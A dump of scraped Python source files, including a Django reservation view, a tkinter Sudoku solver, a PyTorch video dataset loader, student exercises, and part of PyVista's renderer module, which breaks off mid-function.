\"\"\"\n\n def get(self, request, *args, **kwargs):\n self.init_space(request, *args, **kwargs)\n\n reservation_pk = int(kwargs['reservation_pk'])\n if request.user == self.group.manager:\n reservation = get_object_or_404(Reservation, space=self.space, pk=reservation_pk)\n else:\n reservation = get_object_or_404(Reservation, space=self.space, pk=reservation_pk, member=request.user)\n reservation.delete()\n\n return redirect('reservations:space_detail', group_pk=self.group.pk, space_pk=self.space.pk)\n","repo_name":"pcjs156/space-reservation-system","sub_path":"reservations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9261720450","text":"import tkinter as tk\r\n\r\n\r\nboard = [\r\n [5, 3, 0, 0, 7, 0, 0, 0, 0],\r\n [6, 0, 0, 1, 9, 5, 0, 0, 0],\r\n [0, 9, 8, 0, 0, 0, 0, 6, 0],\r\n [8, 0, 0, 0, 6, 0, 0, 0, 3],\r\n [4, 0, 0, 8, 0, 3, 0, 0, 1],\r\n [7, 0, 0, 0, 2, 0, 0, 0, 6],\r\n [0, 6, 0, 0, 0, 0, 2, 8, 0],\r\n [0, 0, 0, 4, 1, 9, 0, 0, 5],\r\n [0, 0, 0, 0, 8, 0, 0, 7, 9]\r\n]\r\n\r\nwindow = tk.Tk()\r\nwindow.title(\"Sudoku Solver\")\r\n\r\ncell_size = 60\r\nboard_size = cell_size * 9\r\n\r\ncanvas = tk.Canvas(window, width=board_size, height=board_size)\r\ncanvas.pack()\r\n\r\ndef draw_board():\r\n canvas.delete(\"all\")\r\n\r\n for row in range(9):\r\n for col in range(9):\r\n cell_value = board[row][col]\r\n cell_x = col * cell_size\r\n cell_y = row * cell_size\r\n\r\n canvas.create_rectangle(cell_x, cell_y, cell_x + cell_size, cell_y + cell_size, outline=\"black\")\r\n\r\n if cell_value != 0:\r\n canvas.create_text(cell_x + cell_size // 2, cell_y + cell_size // 2, text=str(cell_value),\r\n font=(\"Arial\", 20))\r\n\r\n for i in range(10):\r\n line_color = \"black\" if i % 3 == 0 else \"red\"\r\n\r\n canvas.create_line(0, i * cell_size, board_size, i * cell_size, fill=line_color)\r\n canvas.create_line(i * cell_size, 0, i * cell_size, board_size, fill=line_color)\r\n\r\ndef is_valid(row, col, num):\r\n \r\n for i in range(9):\r\n if board[row][i] == num:\r\n return False\r\n\r\n \r\n for i in range(9):\r\n if board[i][col] == num:\r\n return False\r\n\r\n \r\n start_row = (row // 3) * 3\r\n start_col = (col // 3) * 3\r\n for i in range(3):\r\n for j in range(3):\r\n if board[start_row + i][start_col + j] == num:\r\n return False\r\n\r\n return True\r\n\r\ndef solve_sudoku():\r\n for row in range(9):\r\n for col in range(9):\r\n if board[row][col] == 0:\r\n for num in range(1, 10):\r\n if is_valid(row, col, num):\r\n board[row][col] = num\r\n draw_board()\r\n window.update()\r\n\r\n if solve_sudoku():\r\n return True\r\n\r\n board[row][col] = 0\r\n draw_board()\r\n window.update()\r\n\r\n return False\r\n\r\n return True\r\n\r\ndef solve_button_click():\r\n solve_sudoku()\r\n\r\ndraw_board()\r\n\r\n\r\nsolve_button = tk.Button(window, text=\"Solve\", command=solve_button_click)\r\nsolve_button.pack()\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"karthik-2612/Python-Program","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6858081574","text":"#*************************** salvando o arquivo em txt ************\n\ndef salvar_aviao(aeroporto):\n arq = open('aviao.txt','w')\n for pessoa in aeroporto:\n arq.write(f'{pessoa}\\n')\n arq.close()\n#*************************** lendo e salvando em uma lista************\ndef ler():\n aeroporto1=[]\n arq = open('aviao.txt','r')\n for linha in arq:\n linha = linha.strip()\n aeroporto1.append(linha) \n arq.close() \n return aeroporto1 \n\n#*************************** lista das pessoas que estão no aeroporto ************\naeroporto = ['piloto','oficial_A','oficial_B','chefe','comissaria_A',\n 'comissaria_B','policial','presidiario']\naviao = []\n\n#*************************** função que enviara do aeroporto ao avião ************\ndef viagem (): \n\n if len(aeroporto) <= 2: \n print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}') \n aviao.append(aeroporto.pop(0))\n aviao.append(aeroporto.pop(0))\n \n \n else:\n if aeroporto[1]=='piloto'or aeroporto[1]=='chefe' or aeroporto[1]=='policial':\n aeroporto[0],aeroporto[1]=aeroporto[1],aeroporto[0]\n print(f'Estão no aeroporto: {aeroporto}')\n print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}')\n aviao.append(aeroporto.pop(1))\n \n else:\n print(f'Estão no aeroporto: {aeroporto}')\n print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}')\n aviao.append(aeroporto.pop(1))\n \n if aeroporto:\n print(f'Voltando para aeroporto: {aeroporto[0]}')\n print(f'Dentro do avião {aviao}')\n print('\\n') \n else:\n print(f'Todos no avião {aviao}') \n\nfor i in range(0,7):\n (viagem())\nprint('\\n')\nsalvar_aviao(aviao)\n\na=ler()\n#*************************** imprimindo o txt ************\nprint(a)","repo_name":"ohanamirella/TrabalhosPython","sub_path":"Aula 30/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40923827386","text":"__author__ = 'qianyu'\n\nimport torch\nimport torch.utils.data as data\nfrom utils import get_dataset_info\n\n\nclass UCF101(data.Dataset):\n \"\"\"\n Args:\n spatial_transform (callable, optional): A function/transform that takes in an PIL image\n and returns a transformed version. E.g, ``transforms.RandomCrop``\n temporal_transform (callable, optional): A function/transform that takes in a list of frame indices\n and returns a transformed version\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n loader (callable, optional): A function to load an video given its path and frame indices.\n \"\"\"\n\n def __init__(self,\n video_path,\n annotation_path,\n subset,\n n_samples_per_video=1,\n sample_duration=16,\n spatial_transform=None,\n temporal_transform=None,\n target_transform=None):\n self.data, self.class_names = get_dataset_info(\n video_path, annotation_path, subset,\n n_samples_per_video, sample_duration)\n\n self.spatial_transform = spatial_transform\n self.temporal_transform = temporal_transform\n self.target_transform = target_transform\n self.loader = get_loader()\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is class_index of the target class.\n \"\"\"\n path = self.data[index]['video']\n\n frame_indices = self.data[index]['frame_indices']\n if self.temporal_transform is not None:\n frame_indices = self.temporal_transform(frame_indices)\n clip = self.loader(path, frame_indices)\n if self.spatial_transform is not None:\n self.spatial_transform.randomize_parameters()\n clip = [self.spatial_transform(img) for img in clip]\n clip = torch.stack(clip, 0).permute(1, 0, 2, 3)\n\n target = self.data[index]\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return clip, target\n\n def __len__(self):\n return len(self.data)","repo_name":"AmmieQi/video-feature-extraction","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71828936246","text":"class Node:\n def __init__(self, name) -> None:\n self.children = []\n self.name = name\n\n def add_child(self, name):\n self.children.append(Node(name))\n return self\n \n def breadth_first_search(self, array):\n queue = [self]\n while len(queue) > 0:\n current_node = queue.pop(0)\n array.append(current_node.name)\n for node in current_node.children:\n queue.append(node)\n return array\n\nmyTree = Node(1).add_child(2).add_child(3).add_child(4)\nprint(myTree.breadth_first_search([]))","repo_name":"kaiquecaires/algorithms","sub_path":"medium/breadth_first_search/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42210346778","text":"names = [\"Judith\", \"Abel\", \"Tyson\", \"Martha\", \"Beverley\", \"David\", \"Anabel\"]\nestimated_insurance_costs = [1000.0, 2000.0, 3000.0, 4000.0, 5000.0, 6000.0, 7000.0]\nactual_insurance_costs = [1100.0, 2200.0, 3300.0, 4400.0, 5500.0, 6600.0, 7700.0]\n\n#initialize a new variable\ntotal_cost = 0\n\n#itireating trough the first list and add value to total_cost\nfor cost in actual_insurance_costs:\n total_cost += cost\n\n#calculate and print the avg cost\naverage_cost = total_cost / len(actual_insurance_costs)\nprint(\"The average insurance cost: \", average_cost, \" dollars.\")\n\n#iterate trough the list names and print information on the situation and one based on the condition\nfor i in range(0, len(names)):\n name = names[i]\n insurance_cost = actual_insurance_costs[i]\n print(\"The insurance cost for \" + name + \" is \" + str(insurance_cost) + \" dollars\")\n if insurance_cost > average_cost:\n print(\"The insurance cost for \" + name + \" is above average.\")\n elif insurance_cost < average_cost:\n print(\"The insurance cost for \" + name + \" is below average.\")\n else:\n print(\"The insurance cost for \" + name + \" is equal to the average.\")\n\n#updated and print estimate costs\nupdated_estimated_costs = [update * 11/10 for update in estimated_insurance_costs]\nprint(updated_estimated_costs)\n\n#extra challenge\n\n#transform the first for loop into a while\nwhile cost < len(actual_insurance_costs):\n total_cost += cost\n\nprint(total_cost)\n\n#calculate how far the user is above or bellow the average\nfor i in range(0, len(names)):\n name = names[i]\n insurance_cost = actual_insurance_costs[i]\n #difference_cost = insurance_cost - average_cost\n if insurance_cost > average_cost:\n print(\"The extra cost for \" + name +\n \" between the actual and average insurance cost is: \"\n + str(insurance_cost - average_cost) + \" €\")\n elif insurance_cost < average_cost:\n print(\"The benefit for \" + name +\n \" between the actual and average insurance cost is: \"\n + str(average_cost - insurance_cost) + \" €\")\n else:\n print(\"You pay the right price. There is no difference!\")\n","repo_name":"aadelboo/medical_insurance_project","sub_path":"medical_insurance_loops.py","file_name":"medical_insurance_loops.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3992887391","text":"# from project.user import User\nfrom user import User\n\nclass Library:\n def __init__(self):\n self.user_records = []\n self.books_available = {}\n # ^ {\"authors\"(key: str): books(list: str)}\n self.rented_books = {}\n # ^ {\"username\": {\"book_name\"(key:str): days_to_return(int)}}\n\n def get_book(author: str, book_name: str, days_to_return: int, user: User):\n if book_name in self.rented_books[author].values():\n return f\"The book {book_name} is already rented and will be available in \" \\\n f\"{self.rented_books[author]['days_to_return']} days!\"\n user.books.append(book_name)\n self.books_available[author].remove(book_name)\n self.rented_books[user.username] = {book_name: days_to_return}\n\n def return_book(author: str, book_name: str, user: User):\n if book_name in user.books:\n self.rented_books[user.username].remove(book_name)\n self.books_available[author].append(book_name)\n else:\n return f\"{user.username} doesn't have this book in his/her records!\"\n\n\n","repo_name":"ilmagnifico33749/SoftUni_Student_KP","sub_path":"03. Python_OOP_Feb2023/02. Classes and Objects/02. EX/08. Library_v1 - To Finalize/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70100577847","text":"\"\"\"Module containing pyvista implementation of vtkRenderer.\"\"\"\n\nimport collections.abc\nfrom functools import partial, wraps\nfrom typing import Sequence, cast\nimport warnings\n\nimport numpy as np\n\nimport pyvista\nfrom pyvista import MAX_N_COLOR_BARS, vtk_version_info\nfrom pyvista.core._typing_core import BoundsLike\nfrom pyvista.core.errors import PyVistaDeprecationWarning\nfrom pyvista.core.utilities.helpers import wrap\nfrom pyvista.core.utilities.misc import assert_empty_kwargs, try_callback\n\nfrom . import _vtk\nfrom .actor import Actor\nfrom .camera import Camera\nfrom .charts import Charts\nfrom .colors import Color, get_cycler\nfrom .errors import InvalidCameraError\nfrom .helpers import view_vectors\nfrom .render_passes import RenderPasses\nfrom .tools import create_axes_marker, create_axes_orientation_box, parse_font_family\nfrom .utilities.gl_checks import check_depth_peeling, uses_egl\n\nACTOR_LOC_MAP = [\n 'upper right',\n 'upper left',\n 'lower left',\n 'lower right',\n 'center left',\n 'center right',\n 'lower center',\n 'upper center',\n 'center',\n]\n\n\ndef map_loc_to_pos(loc, size, border=0.05):\n \"\"\"Map location and size to a VTK position and position2.\n\n Parameters\n ----------\n loc : str\n Location of the actor. Can be a string with values such as 'right',\n 'left', 'upper', or 'lower'.\n size : Sequence of length 2\n Size of the actor. It must be a list of length 2.\n border : float, default: 0.05\n Size of the border around the actor.\n\n Returns\n -------\n tuple\n The VTK position and position2 coordinates. Tuple of the form (x, y, size).\n\n Raises\n ------\n ValueError\n If the ``size`` parameter is not a list of length 2.\n\n \"\"\"\n if not isinstance(size, Sequence) or len(size) != 2:\n raise ValueError(f'`size` must be a list of length 2. Passed value is {size}')\n\n if 'right' in loc:\n x = 1 - size[1] - border\n elif 'left' in loc:\n x = border\n else:\n x = 0.5 - size[1] / 2\n\n if 'upper' in loc:\n y = 1 - size[1] - border\n elif 'lower' in loc:\n y = border\n else:\n y = 0.5 - size[1] / 2\n\n return x, y, size\n\n\ndef make_legend_face(face):\n \"\"\"\n Create the legend face based on the given face.\n\n Parameters\n ----------\n face : str | None | pyvista.PolyData\n The shape of the legend face. Valid strings are:\n '-', 'line', '^', 'triangle', 'o', 'circle', 'r', 'rectangle'.\n Also accepts ``None`` and instances of ``pyvista.PolyData``.\n\n Returns\n -------\n pyvista.PolyData\n The legend face as a PolyData object.\n\n Raises\n ------\n ValueError\n If the provided face value is invalid.\n \"\"\"\n if face is None:\n legendface = pyvista.PolyData([0.0, 0.0, 0.0])\n elif face in [\"-\", \"line\"]:\n legendface = _line_for_legend()\n elif face in [\"^\", \"triangle\"]:\n legendface = pyvista.Triangle()\n elif face in [\"o\", \"circle\"]:\n legendface = pyvista.Circle()\n elif face in [\"r\", \"rectangle\"]:\n legendface = pyvista.Rectangle()\n elif isinstance(face, pyvista.PolyData):\n legendface = face\n else:\n raise ValueError(\n f'Invalid face \"{face}\". Must be one of the following:\\n'\n '\\t\"triangle\"\\n'\n '\\t\"circle\"\\n'\n '\\t\"rectangle\"\\n'\n '\\tNone'\n '\\tpyvista.PolyData'\n )\n return legendface\n\n\ndef scale_point(camera, point, invert=False):\n \"\"\"Scale a point using the camera's transform matrix.\n\n Parameters\n ----------\n camera : Camera\n The camera who's matrix to use.\n\n point : sequence[float]\n Scale point coordinates.\n\n invert : bool, default: False\n If ``True``, invert the matrix to transform the point out of\n the camera's transformed space. Default is ``False`` to\n transform a point from world coordinates to the camera's\n transformed space.\n\n Returns\n -------\n tuple\n Scaling of the camera in ``(x, y, z)``.\n\n \"\"\"\n if invert:\n mtx = _vtk.vtkMatrix4x4()\n mtx.DeepCopy(camera.GetModelTransformMatrix())\n mtx.Invert()\n else:\n mtx = camera.GetModelTransformMatrix()\n scaled = mtx.MultiplyDoublePoint((point[0], point[1], point[2], 0.0))\n return (scaled[0], scaled[1], scaled[2])\n\n\nclass CameraPosition:\n \"\"\"Container to hold camera location attributes.\n\n Parameters\n ----------\n position : sequence[float]\n Position of the camera.\n\n focal_point : sequence[float]\n The focal point of the camera.\n\n viewup : sequence[float]\n View up of the camera.\n\n \"\"\"\n\n def __init__(self, position, focal_point, viewup):\n \"\"\"Initialize a new camera position descriptor.\"\"\"\n self._position = position\n self._focal_point = focal_point\n self._viewup = viewup\n\n def to_list(self):\n \"\"\"Convert to a list of the position, focal point, and viewup.\n\n Returns\n -------\n list\n List of the position, focal point, and view up of the camera.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.camera_position.to_list()\n [(0.0, 0.0, 1.0), (0.0, 0.0, 0.0), (0.0, 1.0, 0.0)]\n\n \"\"\"\n return [self._position, self._focal_point, self._viewup]\n\n def __repr__(self):\n \"\"\"List representation method.\"\"\"\n return \"[{},\\n {},\\n {}]\".format(*self.to_list())\n\n def __getitem__(self, index):\n \"\"\"Fetch a component by index location like a list.\"\"\"\n return self.to_list()[index]\n\n def __eq__(self, other):\n \"\"\"Comparison operator to act on list version of CameraPosition object.\"\"\"\n if isinstance(other, CameraPosition):\n return self.to_list() == other.to_list()\n return self.to_list() == other\n\n @property\n def position(self): # numpydoc ignore=RT01\n \"\"\"Location of the camera in world coordinates.\"\"\"\n return self._position\n\n @position.setter\n def position(self, value): # numpydoc ignore=GL08\n self._position = value\n\n @property\n def focal_point(self): # numpydoc ignore=RT01\n \"\"\"Location of the camera's focus in world coordinates.\"\"\"\n return self._focal_point\n\n @focal_point.setter\n def focal_point(self, value): # numpydoc ignore=GL08\n self._focal_point = value\n\n @property\n def viewup(self): # numpydoc ignore=RT01\n \"\"\"Viewup vector of the camera.\"\"\"\n return self._viewup\n\n @viewup.setter\n def viewup(self, value): # numpydoc ignore=GL08\n self._viewup = value\n\n\nclass Renderer(_vtk.vtkOpenGLRenderer):\n \"\"\"Renderer class.\"\"\"\n\n # map camera_position string to an attribute\n CAMERA_STR_ATTR_MAP = {\n 'xy': 'view_xy',\n 'xz': 'view_xz',\n 'yz': 'view_yz',\n 'yx': 'view_yx',\n 'zx': 'view_zx',\n 'zy': 'view_zy',\n 'iso': 'view_isometric',\n }\n\n def __init__(\n self, parent, border=True, border_color='w', border_width=2.0\n ): # numpydoc ignore=PR01,RT01\n \"\"\"Initialize the renderer.\"\"\"\n super().__init__()\n self._actors = {}\n self.parent = parent # weakref.proxy to the plotter from Renderers\n self._theme = parent.theme\n self.bounding_box_actor = None\n self.scale = [1.0, 1.0, 1.0]\n self.AutomaticLightCreationOff()\n self._labels = {} # tracks labeled actors\n self._legend = None\n self._floor = None\n self._floors = []\n self._floor_kwargs = []\n # this keeps track of lights added manually to prevent garbage collection\n self._lights = []\n self._camera = Camera(self)\n self.SetActiveCamera(self._camera)\n self._empty_str = None # used to track reference to a vtkStringArray\n self._shadow_pass = None\n self._render_passes = RenderPasses(self)\n self.cube_axes_actor = None\n\n # This is a private variable to keep track of how many colorbars exist\n # This allows us to keep adding colorbars without overlapping\n self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))\n self._scalar_bar_slot_lookup = {}\n self.__charts = None\n\n self._border_actor = None\n if border:\n self.add_border(border_color, border_width)\n\n self.set_color_cycler(self._theme.color_cycler)\n\n @property\n def camera_set(self) -> bool: # numpydoc ignore=RT01\n \"\"\"Get or set whether this camera has been configured.\"\"\"\n if self.camera is None: # pragma: no cover\n return False\n return self.camera.is_set\n\n @camera_set.setter\n def camera_set(self, is_set: bool): # numpydoc ignore=GL08\n self.camera.is_set = is_set\n\n def set_color_cycler(self, color_cycler):\n \"\"\"Set or reset this renderer's color cycler.\n\n This color cycler is iterated over by each sequential :class:`add_mesh() `\n call to set the default color of the dataset being plotted.\n\n When setting, the value must be either a list of color-like objects,\n or a cycler of color-like objects. If the value passed is a single\n string, it must be one of:\n\n * ``'default'`` - Use the default color cycler (matches matplotlib's default)\n * ``'matplotlib`` - Dynamically get matplotlib's current theme's color cycler.\n * ``'all'`` - Cycle through all of the available colors in ``pyvista.plotting.colors.hexcolors``\n\n Setting to ``None`` will disable the use of the color cycler on this\n renderer.\n\n Parameters\n ----------\n color_cycler : str | cycler.Cycler | sequence[ColorLike]\n The colors to cycle through.\n\n Examples\n --------\n Set the default color cycler to iterate through red, green, and blue.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.renderer.set_color_cycler(['red', 'green', 'blue'])\n >>> _ = pl.add_mesh(pv.Cone(center=(0, 0, 0))) # red\n >>> _ = pl.add_mesh(pv.Cube(center=(1, 0, 0))) # green\n >>> _ = pl.add_mesh(pv.Sphere(center=(1, 1, 0))) # blue\n >>> _ = pl.add_mesh(pv.Cylinder(center=(0, 1, 0))) # red again\n >>> pl.show()\n\n \"\"\"\n cycler = get_cycler(color_cycler)\n if cycler is not None:\n # Color cycler - call object to generate `cycle` instance\n self._color_cycle = cycler()\n else:\n self._color_cycle = None\n\n @property\n def next_color(self): # numpydoc ignore=RT01\n \"\"\"Return next color from this renderer's color cycler.\"\"\"\n if self._color_cycle is None:\n return self._theme.color\n return next(self._color_cycle)['color']\n\n @property\n def _charts(self):\n \"\"\"Return the charts collection.\"\"\"\n # lazy instantiation here to avoid creating the charts object unless needed.\n if self.__charts is None:\n self.__charts = Charts(self)\n self.AddObserver(\"StartEvent\", partial(try_callback, self._before_render_event))\n return self.__charts\n\n @property\n def camera_position(self): # numpydoc ignore=RT01\n \"\"\"Return or set the camera position of active render window.\n\n Returns\n -------\n pyvista.CameraPosition\n Camera position.\n\n \"\"\"\n return CameraPosition(\n scale_point(self.camera, self.camera.position, invert=True),\n scale_point(self.camera, self.camera.focal_point, invert=True),\n self.camera.up,\n )\n\n @camera_position.setter\n def camera_position(self, camera_location): # numpydoc ignore=GL08\n if camera_location is None:\n return\n elif isinstance(camera_location, str):\n camera_location = camera_location.lower()\n if camera_location not in self.CAMERA_STR_ATTR_MAP:\n raise InvalidCameraError(\n 'Invalid view direction. '\n 'Use one of the following:\\n '\n f'{\", \".join(self.CAMERA_STR_ATTR_MAP)}'\n )\n\n getattr(self, self.CAMERA_STR_ATTR_MAP[camera_location])()\n\n elif isinstance(camera_location[0], (int, float)):\n if len(camera_location) != 3:\n raise InvalidCameraError\n self.view_vector(camera_location)\n else:\n # check if a valid camera position\n if not isinstance(camera_location, CameraPosition):\n if not len(camera_location) == 3:\n raise InvalidCameraError\n elif any([len(item) != 3 for item in camera_location]):\n raise InvalidCameraError\n\n # everything is set explicitly\n self.camera.position = scale_point(self.camera, camera_location[0], invert=False)\n self.camera.focal_point = scale_point(self.camera, camera_location[1], invert=False)\n self.camera.up = camera_location[2]\n\n # reset clipping range\n self.reset_camera_clipping_range()\n self.camera_set = True\n self.Modified()\n\n def reset_camera_clipping_range(self):\n \"\"\"Reset the camera clipping range based on the bounds of the visible actors.\n\n This ensures that no props are cut off\n \"\"\"\n self.ResetCameraClippingRange()\n\n @property\n def camera(self): # numpydoc ignore=RT01\n \"\"\"Return the active camera for the rendering scene.\"\"\"\n return self._camera\n\n @camera.setter\n def camera(self, source): # numpydoc ignore=GL08\n self._camera = source\n self.SetActiveCamera(self._camera)\n self.camera_position = CameraPosition(\n scale_point(source, source.position, invert=True),\n scale_point(source, source.focal_point, invert=True),\n source.up,\n )\n self.Modified()\n self.camera_set = True\n\n @property\n def bounds(self) -> BoundsLike: # numpydoc ignore=RT01\n \"\"\"Return the bounds of all actors present in the rendering window.\"\"\"\n the_bounds = np.array([np.inf, -np.inf, np.inf, -np.inf, np.inf, -np.inf])\n\n def _update_bounds(bounds):\n def update_axis(ax):\n if bounds[ax * 2] < the_bounds[ax * 2]:\n the_bounds[ax * 2] = bounds[ax * 2]\n if bounds[ax * 2 + 1] > the_bounds[ax * 2 + 1]:\n the_bounds[ax * 2 + 1] = bounds[ax * 2 + 1]\n\n for ax in range(3):\n update_axis(ax)\n return\n\n for actor in self._actors.values():\n if isinstance(actor, (_vtk.vtkCubeAxesActor, _vtk.vtkLightActor)):\n continue\n if (\n hasattr(actor, 'GetBounds')\n and actor.GetBounds() is not None\n and id(actor) != id(self.bounding_box_actor)\n ):\n _update_bounds(actor.GetBounds())\n\n if np.any(np.abs(the_bounds)):\n the_bounds[the_bounds == np.inf] = -1.0\n the_bounds[the_bounds == -np.inf] = 1.0\n\n return cast(BoundsLike, tuple(the_bounds))\n\n @property\n def length(self): # numpydoc ignore=RT01\n \"\"\"Return the length of the diagonal of the bounding box of the scene.\n\n Returns\n -------\n float\n Length of the diagional of the bounding box.\n \"\"\"\n return pyvista.Box(self.bounds).length\n\n @property\n def center(self): # numpydoc ignore=RT01\n \"\"\"Return the center of the bounding box around all data present in the scene.\n\n Returns\n -------\n list\n Cartesian coordinates of the center.\n\n \"\"\"\n bounds = self.bounds\n x = (bounds[1] + bounds[0]) / 2\n y = (bounds[3] + bounds[2]) / 2\n z = (bounds[5] + bounds[4]) / 2\n return [x, y, z]\n\n @property\n def background_color(self): # numpydoc ignore=RT01\n \"\"\"Return the background color of this renderer.\"\"\"\n return Color(self.GetBackground())\n\n @background_color.setter\n def background_color(self, color): # numpydoc ignore=GL08\n self.set_background(color)\n self.Modified()\n\n def _before_render_event(self, *args, **kwargs):\n \"\"\"Notify all charts about render event.\"\"\"\n for chart in self._charts:\n chart._render_event(*args, **kwargs)\n\n def enable_depth_peeling(self, number_of_peels=None, occlusion_ratio=None):\n \"\"\"Enable depth peeling to improve rendering of translucent geometry.\n\n Parameters\n ----------\n number_of_peels : int, optional\n The maximum number of peeling layers. Initial value is 4\n and is set in the ``pyvista.global_theme``. A special value of\n 0 means no maximum limit. It has to be a positive value.\n\n occlusion_ratio : float, optional\n The threshold under which the depth peeling algorithm\n stops to iterate over peel layers. This is the ratio of\n the number of pixels that have been touched by the last\n layer over the total number of pixels of the viewport\n area. Initial value is 0.0, meaning rendering has to be\n exact. Greater values may speed up the rendering with\n small impact on the quality.\n\n Returns\n -------\n bool\n If depth peeling is supported.\n\n \"\"\"\n if number_of_peels is None:\n number_of_peels = self._theme.depth_peeling.number_of_peels\n if occlusion_ratio is None:\n occlusion_ratio = self._theme.depth_peeling.occlusion_ratio\n depth_peeling_supported = check_depth_peeling(number_of_peels, occlusion_ratio)\n if depth_peeling_supported:\n self.SetUseDepthPeeling(True)\n self.SetMaximumNumberOfPeels(number_of_peels)\n self.SetOcclusionRatio(occlusion_ratio)\n self.Modified()\n return depth_peeling_supported\n\n def disable_depth_peeling(self):\n \"\"\"Disable depth peeling.\"\"\"\n self.SetUseDepthPeeling(False)\n self.Modified()\n\n def enable_anti_aliasing(self, aa_type='ssaa'):\n \"\"\"Enable anti-aliasing.\n\n Parameters\n ----------\n aa_type : str, default: 'ssaa'\n Anti-aliasing type. Either ``\"fxaa\"`` or ``\"ssaa\"``.\n\n \"\"\"\n if not isinstance(aa_type, str):\n raise TypeError(f'`aa_type` must be a string, not {type(aa_type)}')\n aa_type = aa_type.lower()\n\n if aa_type == 'fxaa':\n if uses_egl(): # pragma: no cover\n # only display the warning when not building documentation\n if not pyvista.BUILDING_GALLERY:\n warnings.warn(\n \"VTK compiled with OSMesa/EGL does not properly support \"\n \"FXAA anti-aliasing and SSAA will be used instead.\"\n )\n self._render_passes.enable_ssaa_pass()\n return\n self._enable_fxaa()\n\n elif aa_type == 'ssaa':\n self._render_passes.enable_ssaa_pass()\n\n else:\n raise ValueError(f'Invalid `aa_type` \"{aa_type}\". Should be either \"fxaa\" or \"ssaa\"')\n\n def disable_anti_aliasing(self):\n \"\"\"Disable all anti-aliasing.\"\"\"\n self._render_passes.disable_ssaa_pass()\n self.SetUseFXAA(False)\n self.Modified()\n\n def _enable_fxaa(self):\n \"\"\"Enable FXAA anti-aliasing.\"\"\"\n self.SetUseFXAA(True)\n self.Modified()\n\n def _disable_fxaa(self):\n \"\"\"Disable FXAA anti-aliasing.\"\"\"\n self.SetUseFXAA(False)\n self.Modified()\n\n def add_border(self, color='white', width=2.0):\n \"\"\"Add borders around the frame.\n\n Parameters\n ----------\n color : ColorLike, default: \"white\"\n Color of the border.\n\n width : float, default: 2.0\n Width of the border.\n\n Returns\n -------\n vtk.vtkActor2D\n Border actor.\n\n \"\"\"\n points = np.array([[1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 0.0], [1.0, 0.0, 0.0]])\n\n lines = np.array([[2, 0, 1], [2, 1, 2], [2, 2, 3], [2, 3, 0]]).ravel()\n\n poly = pyvista.PolyData()\n poly.points = points\n poly.lines = lines\n\n coordinate = _vtk.vtkCoordinate()\n coordinate.SetCoordinateSystemToNormalizedViewport()\n\n mapper = _vtk.vtkPolyDataMapper2D()\n mapper.SetInputData(poly)\n mapper.SetTransformCoordinate(coordinate)\n\n actor = _vtk.vtkActor2D()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(Color(color).float_rgb)\n actor.GetProperty().SetLineWidth(width)\n\n self.AddViewProp(actor)\n self.Modified()\n\n self._border_actor = actor\n return actor\n\n @property\n def has_border(self): # numpydoc ignore=RT01\n \"\"\"Return if the renderer has a border.\"\"\"\n return self._border_actor is not None\n\n @property\n def border_width(self): # numpydoc ignore=RT01\n \"\"\"Return the border width.\"\"\"\n if self.has_border:\n return self._border_actor.GetProperty().GetLineWidth()\n return 0\n\n @property\n def border_color(self): # numpydoc ignore=RT01\n \"\"\"Return the border color.\"\"\"\n if self.has_border:\n return Color(self._border_actor.GetProperty().GetColor())\n return None\n\n def add_chart(self, chart, *charts):\n \"\"\"Add a chart to this renderer.\n\n Parameters\n ----------\n chart : Chart\n Chart to add to renderer.\n\n *charts : Chart\n Charts to add to renderer.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> chart = pv.Chart2D()\n >>> _ = chart.plot(range(10), range(10))\n >>> pl = pv.Plotter()\n >>> pl.add_chart(chart)\n >>> pl.show()\n\n \"\"\"\n if _vtk.vtkRenderingContextOpenGL2 is None: # pragma: no cover\n from pyvista.core.errors import VTKVersionError\n\n raise VTKVersionError(\n \"VTK is missing vtkRenderingContextOpenGL2. Try installing VTK v9.1.0 or newer.\"\n )\n self._charts.add_chart(chart, *charts)\n\n @property\n def has_charts(self): # numpydoc ignore=RT01\n \"\"\"Return whether this renderer has charts.\"\"\"\n return self.__charts is not None\n\n @wraps(Charts.set_interaction)\n def set_chart_interaction(self, interactive, toggle=False): # numpydoc ignore=PR01,RT01\n \"\"\"Wrap ``Charts.set_interaction``.\"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n return self._charts.set_interaction(interactive, toggle) if self.has_charts else []\n\n @wraps(Charts.get_charts_by_pos)\n def _get_charts_by_pos(self, pos):\n \"\"\"Wrap ``Charts.get_charts_by_pos``.\"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n return 